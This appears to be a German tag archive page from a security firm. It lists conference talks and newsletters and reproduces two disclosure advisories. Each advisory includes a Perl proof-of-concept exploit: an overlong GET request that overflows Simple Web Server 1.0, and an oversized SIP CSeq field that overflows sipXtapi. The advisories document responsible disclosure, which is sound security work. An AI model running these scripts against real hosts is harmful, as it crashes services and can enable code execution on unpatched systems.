Schlagwort-Archive: Vulnerability

CSA CEE Summit 2013

23.10.2013 – Ljubljana, Slovenia 

Exploiting Virtual File Formats for Fun and Profit (Download, see also here)

Newsletter Nr. 41, “Exploiting Virtual File Formats for Fun and Profit”, stellt eines der großen ERNW-Forschungsprojekte des Jahres 2012 vor. Das Projekt resultiert in der Aufdeckung verschiedener Schwachstellen VMware-basierter Cloud-Umgebungen und stellt neue Angriffsvektoren gegen “die Cloud” vor. Dieser Newsletter wurde von unserem Virtualization & Cloud Security Team unter der Leitung von Matthias Luft und der Mitarbeit von Pascal Turbing verfasst.

ERNW_Newsletter_41_ExploitingVirtualFileFormats.pdf

ERNW_Newsletter_41_ExploitingVirtualFileFormats_signed.pdf

Author: Michael Thumann

1. Summary
Simple Web Server doesn’t do proper bounds checking handling normal GET requests.
Sending an overlong page or script name, it causes an buffer overflow and an attacker
can controll the EIP to run arbitrary code on the victims machine.

2. Severity

Critical

3. Systems affected

The vulnerability was testest with Simple Web Server 1.0

4. Patch Availability

No patch available

5. Details

The follwoing request causes Simple Web Server to crash:

GET /AAAAAA…..AAAA with 260 As

A Proof of Concept Code is published with this Advisory

6. Solution
Use another web server ;-)

7. Timeline
17 Feb 2005: Vulnerability reported to vendor
28 Feb 2005: 2nd report because the vendor didn’t respond
07 Mar 2005: 3rd mail sent to thre vendor – vendor didn’t respond
18 Apr 2005: Public Disclosure

8. Exploit

!/usr/bin/perl
DoS Exploit By mthumann@ernw.de
Tested against WinXP + SP2
Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
buffer[250]

use Socket;
print “PMSoftware Simple Web Server Exploit by Michael Thumann \n\n”;

if (not $ARGV[0]) {
print “Usage: swsexploit.pl\n”;exit;}

$ip=$ARGV[0];

print “Sending Shellcode to: ” . $ip . “\n\n”; my $testcode=
“ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”.
“BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”.
“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”.
“DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD”.
“EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE”.
“FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF”.
“ABCDEFGHIJAAAA”; #EIP =41414141

my $attack=”GET /”.$testcode.” HTTP/1.1\n” ;

$target= inet_aton($ip) || die(“inet_aton problems”);
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’)||0) ||
die(“Socket problems\n”);
if(connect(S,pack “SnA4x8″,2,80,$target)){
select(S);
$|=1;
print $attack;
my @in=<s>;
select(STDOUT);
close(S);
} else { die(“Can’t connect…\n”); }

9. Disclaimer
The informations in this advisory are provided “AS IS” without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

Author: Michael Thumann

1. Summary

The sipXtapi library from sip foundry contains a buffer overflow when parsing the CSeq field.
This flaw can be used by an attacker to gain control over EIP and execute arbitrary code.

2. Severity

Critical

3. Products affected

  • sipXtapi: all version compiled before 24 of march 2006
  • PingTel products
  • AOL Triton

4. Patch Availability
A patch is available within the source tree and the affected products of PingTel and AOL have beed updated.

5. Details
Sending a CSeq field value greater than 24 bytes triggers the buffer ovlerflow condition.

6. Solution
Update the affected products to the actual version.

7. Timeline
20 Mar 2006: Vulnerability reported to vendor 20 Mar 2006: Answer from vendor
24 Mar 2006: Patch available
10 July 2006: Public Disclosure

8. Exploit
#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;

print “sipXtapi Exploit by Michael Thumann \n\n”;

if (not $ARGV[0]) {
print “Usage: sipx.pl \n”; exit;}

$target=$ARGV[0];
my $source =”127.0.0.1″;
my $target_port = 5060;
my $user =”bad”;
my $eip=”\x41\x41\x41\x41″;
my $cseq =
“\x31\x31\x35\x37\x39\x32\x30\x38″.
“\x39\x32\x33\x37\x33\x31\x36\x31″.
“\x39\x35\x34\x32\x33\x35\x37\x30″.
$eip;
my $packet = To: \r
Via: SIP/2.0/UDP $target:3277\r
From: “moz”\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END

print “Sending Packet to: ” . $target . “\n\n”; socket(PING, PF_INET, SOCK_DGRAM, getprotobyname(“udp”)); my $ipaddr = inet_aton($target); my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die “cannot send to $target : $target_port : $!\n”; print “Done.\n”;

9. Thanks
We would like to thank the guys from sip foundry for working together on this issue in a professional and responsible way.

10. Disclaimer
The informations in this advisory are provided “AS IS” without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory.

Amsterdam, 14-16 March 2012
How We Compromised the Cisco VoIP Crypto Ecosystem
Speaker: Enno Rey & Daniel Mende

 

In gewohnter Tradition werden wir auch auf der Black Hat 2012 einen Vortrag halten. Enno Rey und Daniel Mende stellen Schwachstellen in der Cisco Unified Communication Infrastruktur dar, die von ERNW im Rahmen eines Kundenprojekts aufgedeckt und an den Hersteller kommuniziert wurden.  Die Schwachstellen werden technisch detailliert erläutert, inklusive einer Demonstration (und Werkzeugen ;-) )wie diese zur Kompromittierung der Voice Infrastruktur führen.

Die virtuelle Welt des Secondlife ist für viele Menschen ein Ort des zweiten Selbstentwurfs. In der virtuellen Welt fängt man ganz neu an, und schafft sich ein neues, zweites Leben. Daher der Name. Je stärker allerdings der Reiz dieser virtuellen Gesellschaftsform wurde, desto schonungsloser dringt die reale Welt hart in sie ein: Heidelberger Hacker decken Sicherheitslücken auf.

Ist Secondlife wirklich sicher? Diese Frage stellt Michael Thuman, Chief Security Officer bei der Heidelberger ERNW GmbH auf einem Symposium der IT-Messe Systems. In der realen Welt ist ERNW eine der führenden Gesellschaften für Sicherheit in der Informationstechnik. Die Experten sind international gefragte „Hacker mit weißem Hut“. Sie penetrieren im Auftrag vor allem von Banken, Versicherern und anderen sicherheitsorientierten Unternehmen die Datennetze, hacken sich rein und finden Sicherheitslücken.

Michael Thumann: „In dem Maße, wie online-Spiele zu einem realen Millionenmarkt geworden sind, steigen die Risiken. Das gilt nicht nur für die Spieler, sondern auch für die Unternehmen, die ins Geschäft involviert sind. Deshalb ist es im Interesse aller Beteiligten, wenn Lücken so schnell wie möglich geschlossen werden.“

Secondlife ist eine virtuelle Volkswirtschaft mit über 10 Millionen virtualisierten Bürgern. Laut eigenen Angaben setzt die Secondlife Community pro Monat 7,5 Millionen der Secondlife-Währung Linden-Dollars um. Das Ganze wäre nur virtueller Spaß, wäre da nicht auch beim Geld eine Schnittstelle ins Reale: es existiert ein realer Wechselkurs. 230 Lindendollar werden für
1 US-Dollar gehandelt und verkauft Die kursierende „Geldmenge“ wird mit 3,6 Milliarden Lindendollars angegeben. Der Monatsumsatz von 7,5 Mio Linden-Dollars steht also für über 32.000 reale US-Dollars. Hochgerechnet ist Secondlife also ein Markt, in dem nahezu 400.000 harte US-Dollars pro Jahr bewegt werden. Die Tendenz ist steigend.

Thumann: „Speziell beim Secondlife Client ist das Bestreben der Entwickler erkennbar, eine sichere Software zu entwicklen. Aber Secondlife als Ganzes ist noch lange nicht sicher genug. Es gibt viele Angriffs-Szenarien, man kann sich beispielsweise innerhalb von kurzer Zeit real bereichern oder aus der virtuellen Welt reale Server im Internet attackieren.“ Die schöne neue Welt hat Lücken. So sehr die traditionellen Begriffe von Wahrheit und Wahrhaftigkeit in einer Welt, die sich selbst neu entwirft, zur Neuinterpretation einladen; Betrüger gibt es auch im virtuellen Leben. Sie können die Virtuellen Existenzen um reales Vermögen erleichtern. Und es gibt real denkende Instanzen, die sich für die reale Sicherheit der fantasierenden Welt einsetzen.

Eine live-Demonstration der gefundenen Schwachstellen in Secondlife stellt ERNW in Deutschland erstmals im Rahmen der Systems 2007 (München) am 23.10.2007, 17:15h vor. (IT-Security Area, Halle 3, Forum Rot).

Wenn Sie mehr Info wünschen, schreiben Sie uns.

Hier finden Sie den Vortrag von Michael Thumann zum Download: Hacking2ndLife.pdf

ERNW @ Black Hat Europe

12-15 April 2010, Barcelona / Hintergrundartikel auf DarkReading.com

Zum fünften Mal in Folge stellt ERNW auf der Black Hat Conference neueste Forschungsergebnisse einem internationalen Publikum zur Verfügung. In diesem Jahr sprechen Enno Rey und Daniel Mende über Verwundbarkeiten von Cisco Enterprise WLAN Lösungen.

Weitere Informationen zum Vortrag finden Sie unter www.blackhat.com, einen begleitenden Hintergrundartikel finden Sie auf www.DarkReading.com.

In diesem Newsletter werden drei Security ‚Appetizer‘ und eine Studie zur Sicherheit von Cisco WLAN Enterprise-Lösungen vorgestellt. Die drei Appetizer finden Sie auf Deutsch in Newsletter 30a und die englischsprachige Studie in Newsletter 30b.

ERNW_Newsletter_30a_3IT-Security_Bits_de.pdf
ERNW_Newsletter_30a_3IT-Security_Bits_signed_de.pdf
ERNW_Newsletter_30b_Cisco_WLAN_Sec_en.pdf
ERNW_Newsletter_30b_Cisco_WLAN_Sec_signed_en.pdf

In dem neusten Newsletter führt Sie Matthias Luft in das Thema “Data Leakage Prevention” (DLP) ein. Neben einigen grundlegenden Definitionen und Erklärungen werden zwei DLP Lösungen im Detail betrachtet. Die Bewertung basiert auf mehreren Voraussetzungen und daraus hergeleiteten Testszenarien. Diese decken eine Vielzahl DLP-relevanter Aspekte ab und dienen daher auch als Leitfaden für weitere Prüfungen. Das Dokument ist in englischer Sprache verfasst.

ERNW_Newsletter_29_Data_Leakage_Prevention_en.pdf
ERNW_Newsletter_29_Data_Leakage_Prevention_signed_en.pdf

ERNW’s Responsible Disclosure Policy folgend hat Michael Thumann eine XSS Schwachstelle im BlackBerry Enterprise Server an den Hersteller kommuniziert.

Advisory: Link

Hersteller Mitteilung: Link